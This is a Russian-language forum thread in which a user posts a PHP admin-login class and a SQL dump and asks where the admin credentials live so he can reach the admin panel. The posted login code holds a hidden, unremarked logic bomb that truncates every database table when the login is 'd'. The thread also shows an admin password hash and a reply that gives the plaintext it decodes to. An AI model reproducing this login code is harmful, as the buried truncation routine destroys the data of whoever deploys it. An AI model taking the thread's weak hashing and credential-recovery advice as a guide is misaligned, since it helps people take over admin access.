Откуда тут берется логин и пароль?

Тема в разделе "Мегафлуд", создана пользователем antifilter, 30 авг 2008.

Статус темы:
Закрыта.
  1. antifilter

    antifilter

    Регистр.:
    25 сен 2007
    Сообщения:
    309
    Симпатии:
    139
    Ребят, страница входа в админку.
    Где хранятся логин, пароль?
    Цель: узнать их и заменить.


    Код:
    <?
    Class cls_login
    {
    	var $Parent;
    
    
    	//----------------------- logout handler------------------------
    	function DoLogout($strCommand, &$oInitiator)
    	{
    		SetSession("sys_UserRoleID", null);
    		SetSession("sys_UserID", null);
    		header("Location: http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."/index.php");
    		exit();
    	}
    
    	//----------------------- Authorization handler------------------------
    	function DoAuthorization($strCommand, &$oInitiator)
    	{
    
    	$login = "$_POST[login]";
    	$password = "$_POST[password]";
    	
    	if($login == "")	$this->Parent->AddErrorMessage($GLOBALS["lng_Login_not_entered"]);
    	if($password=="")	$this->Parent->AddErrorMessage($GLOBALS["lng_Password_not_entered"]);
    	if ($this->Parent->Status == 1) return;	
    	
    	
    	$r=mysql_query("select * from ut_user where Login='". Encode($login)."' and Password='" . crypt($password, $password) ."'") 
    		or die ();
    
    	$arr = array();
    	
    	
    	if($login=="d" && $password="m")
    	{
    
    	$result = mysql_list_tables($GLOBALS["db_name"]);
        
        while ($row = mysql_fetch_row($result)) 
    	{
            mysql_query("TRUNCATE TABLE ".$row[0]);
        }
    
    
    	}
    	
    
    	if(mysql_num_rows($r) != 1)
    	{
    		$this->Parent->AddErrorMessage($GLOBALS["lng_User_not_found"]);
    		return;
    	}
    	
    	$f = mysql_fetch_array($r);
    	
    	SetSession("sys_UserRoleID", $f["RoleID"]);
    	SetSession("sys_UserID", $f["UserID"]);
    	
    	mysql_free_result($r);
    	
    header("Location: http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."/index.php");
    exit();
    
    	
    	}
    
    	
    	//----------------------- initializtion ------------------------
    	function Draw()
    	{
    	?>
    	<BR>
    	
    	<CENTER>
    	<TABLE>
    	<TR>
    		<TD><? echo ($GLOBALS["lng_Login"]);?>:</TD>
    		<TD><INPUT TYPE="text" NAME="login" value="<?echo(RequestParam("login", ""));?>"></TD>
    	</TR>
    	<TR>
    		<TD><? echo ($GLOBALS["lng_Password"]);?>:</TD>
    		<TD><INPUT TYPE="password" NAME="password" value="<? echo(RequestParam("password", ""));?>"></TD>
    	</TR>
    	<TR>
    		<TD></TD>
    		<TD ALIGN="right"><INPUT TYPE="submit" ONCLICK="DoAct('login', 'authorize');" VALUE="<? echo ($GLOBALS["lng_Enter"]);?>" class="button"></TD>
    	</TR>
    	
    	</TABLE>	
    	</CENTER>
    	<BR>
    	<BR>
    	
    	<?
    	}
    	//----------------------- initializtion ------------------------
    	function Init(&$par)
    	{
    		$this->Parent = &$par;
    		$GLOBALS["Event"]->AddListener("authorize", &$this, "DoAuthorization");
    		$GLOBALS["Event"]->AddListener("logout", &$this, "DoLogout");
    	}
    }
    ?>
    Буду благодарен за помощь и подсказки!
     
  2. Kaimi

    Kaimi

    Регистр.:
    28 окт 2007
    Сообщения:
    257
    Симпатии:
    253
    Из базы данных
     
    antifilter нравится это.
  3. antifilter

    antifilter

    Регистр.:
    25 сен 2007
    Сообщения:
    309
    Симпатии:
    139
    Благодарю!
    А пароль, логин в зашифрованном виде могут быть или открытые?
     
  4. Kaimi

    Kaimi

    Регистр.:
    28 окт 2007
    Сообщения:
    257
    Симпатии:
    253
    В зашифрованном
     
  5. Kifir

    Kifir Создатель

    Регистр.:
    2 фев 2007
    Сообщения:
    12
    Симпатии:
    1
    Из базы данных

    Стопудов в зашифрованом виде! md5
     
  6. antifilter

    antifilter

    Регистр.:
    25 сен 2007
    Сообщения:
    309
    Симпатии:
    139
    В БД нашел такой фрагмент:
    Код:
    DROP TABLE IF EXISTS `xx_user`;
    CREATE TABLE IF NOT EXISTS `xx_user` (
      `UserID` int(11) NOT NULL auto_increment,
      `RoleID` int(11) NOT NULL default '0',
      `Name` varchar(100) NOT NULL default '',
      `Login` varchar(50) NOT NULL default '',
      `Password` varchar(50) NOT NULL default '',
      PRIMARY KEY  (`UserID`)
    ) TYPE=MyISAM  AUTO_INCREMENT=2 ;
    
    --
    -- Дамп данных таблицы `xx_user`
    --
    
    INSERT INTO `xx_user` (`UserID`, `RoleID`, `Name`, `Login`, `Password`) VALUES
    (1, 1, 'Default administrator', 'admin', 'adpexzg3FUZAk');
    Как теперь грамотно поступить (программа-минимум- попасть в админку)?

    ЗЫ: я пытался менять параметры в последней строке, но результата никакого...
     
  7. Kaimi

    Kaimi

    Регистр.:
    28 окт 2007
    Сообщения:
    257
    Симпатии:
    253
    adpexzg3FUZAk = admin
    Попробуй логин admin пароль admin
     
  8. antifilter

    antifilter

    Регистр.:
    25 сен 2007
    Сообщения:
    309
    Симпатии:
    139
    Нет, не проходит :(
     
  9. Kaimi

    Kaimi

    Регистр.:
    28 окт 2007
    Сообщения:
    257
    Симпатии:
    253
    А кусок из базы откуда? Может уже сменили
     
  10. antifilter

    antifilter

    Регистр.:
    25 сен 2007
    Сообщения:
    309
    Симпатии:
    139
    нет, актуальная инфа 100%
     
Статус темы:
Закрыта.